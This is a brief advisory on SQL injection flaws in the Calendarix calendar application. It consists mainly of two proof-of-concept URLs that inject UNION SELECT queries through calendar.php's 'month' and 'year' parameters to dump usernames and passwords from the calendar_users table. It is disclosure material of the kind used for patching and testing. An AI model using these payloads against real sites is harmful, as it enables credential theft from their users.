Calendarix Multiple SQL Injection Vulnerabilities

Calendarix Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proofs of concept are available:

http://www.example.com/calendar.php?month=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23

http://www.example.com/calendar.php?month=&year=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23